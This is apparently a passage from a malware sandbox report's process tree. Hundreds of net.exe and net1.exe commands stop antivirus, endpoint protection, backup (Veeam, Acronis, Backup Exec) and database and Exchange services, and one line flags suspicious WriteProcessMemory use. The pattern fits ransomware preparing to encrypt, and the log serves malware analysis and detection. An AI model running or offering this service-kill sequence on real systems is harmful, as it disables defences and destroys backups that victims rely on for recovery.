C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵PID:2940
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:1872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:3372
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵PID:2196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:4020
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:2156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵PID:3432
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵PID:3112
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:1588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:3964
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵PID:840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:3356
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:2248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵PID:3364
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:4048
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵PID:2076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:3288
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:2104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:4004
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵PID:2392
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵PID:2096
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵PID:2056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:3512
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:2108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵PID:2780
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:2080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:3448
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:1356
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:3064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:3148
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵PID:3056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵PID:3464
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:3048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵PID:2388
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:3040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:3416
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵PID:4028
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵PID:3024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:3524
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵PID:3016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:2700
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵PID:3008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:3620
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:2992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵PID:3504
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵PID:2984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:3936
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:3600
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:4000
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:3576
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2488
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:3404
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:4020
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:3140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵PID:3200
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:3304
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:2912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:3324
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2572
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:2896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:3380
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2616
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵PID:2880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:3176
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:2652
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2424
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:2680
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:2844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:2404
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:1708
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:2828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:1584
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:2820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:4048
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y2⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:3284
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y2⤵PID:2804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:2136
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:2552
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2320
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y2⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:2696
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:2768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:2264
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵PID:2760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:3988
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:2352
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:2744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:1520
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:2340
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵PID:2720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:3944
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:4012
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2612
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵PID:2408
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵PID:2120
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:3888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:3268
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y2⤵PID:3648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:3008
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y2⤵PID:2956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:4360
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:3628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:3212
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y2⤵PID:3784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:4300
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:3744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:4072
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵PID:3492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:4232
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:2980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵PID:4088
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵PID:1064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:2632
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:3876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:3080
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:3620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵PID:4224
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:3656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:4080
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵PID:3836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:3840
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:2144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:2988
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵PID:3584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:4272
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:3576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵PID:3052
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵PID:3420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:3120
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:3428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:4084
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:592
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:3512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:4324
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵PID:3436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:4556
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:3556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:4392
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y2⤵PID:3776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:4256
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:3756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:4248
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y2⤵PID:3736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵PID:4332
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:3476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵PID:4308
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y2⤵PID:3400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:3984
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:3440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵PID:4468
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y2⤵PID:3044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:4288
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:3456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:240
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:3404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵PID:4344
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:3376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵PID:4116
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:3396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵PID:1952
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y2⤵PID:3604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:2600
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y2⤵PID:2072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵PID:4460
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:4152
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y2⤵PID:3364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:2388
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:3380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:4100
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵PID:3352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:4180
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y2⤵PID:3332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:4128
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:3592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:2180
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:3312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:3184
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y2⤵PID:3516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:4240
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y2⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:3180
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:3300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:1048
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y2⤵PID:2848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:2256
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y2⤵PID:3168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:2060
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:3468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:4068
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:2424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:2736
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:2792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:2240
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:2468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:2880
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:2892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:4164
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:2564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:4032
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:2860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:1656
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:2320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:2904
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:2496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:4264
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:3248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:4476
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:2876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:3892
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:2540
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:3232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:4216
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:2628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:2664
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:4384
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y2⤵PID:3108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:4208
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:3276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵PID:2248
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y2⤵PID:3912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:1140
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:3256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:3708
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y2⤵PID:988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:1768
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:2080
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:2884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:2220
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y2⤵PID:2224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:2428
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:1640
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵PID:3000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:792
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:2548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:2984
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:3980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:652
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵PID:2580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:2428
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:2156
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y2⤵PID:3596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:3924
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵PID:4036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:3356
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵PID:2188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:3392
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:2260
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵PID:3096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:2068
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵PID:2648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:3752
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵PID:2824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:3884
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:2724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:2832
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵PID:3580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:1872
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:1384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:1336
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:4000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:2608
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:2332
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:3636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:3036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:2996
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2772
-
